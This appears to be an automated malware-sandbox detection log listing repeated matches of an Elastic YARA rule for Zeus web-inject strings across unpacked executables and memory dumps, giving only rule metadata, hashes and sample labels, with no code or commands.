Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.nFjEHtbDTFjy.exe.28f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.nFjEHtbDTFjy.exe.2172000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2be2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nFjEHtbDTFjy.exe.690000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2ef0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nFjEHtbDTFjy.exe.32f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nFjEHtbDTFjy.exe.20d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.nFjEHtbDTFjy.exe.20f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nFjEHtbDTFjy.exe.29a2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2ab0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.nFjEHtbDTFjy.exe.2ba0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.840698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2d82000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2d92000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2be2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.nFjEHtbDTFjy.exe.2490000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.nFjEHtbDTFjy.exe.2ef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.nFjEHtbDTFjy.exe.2f20000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1739760452.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
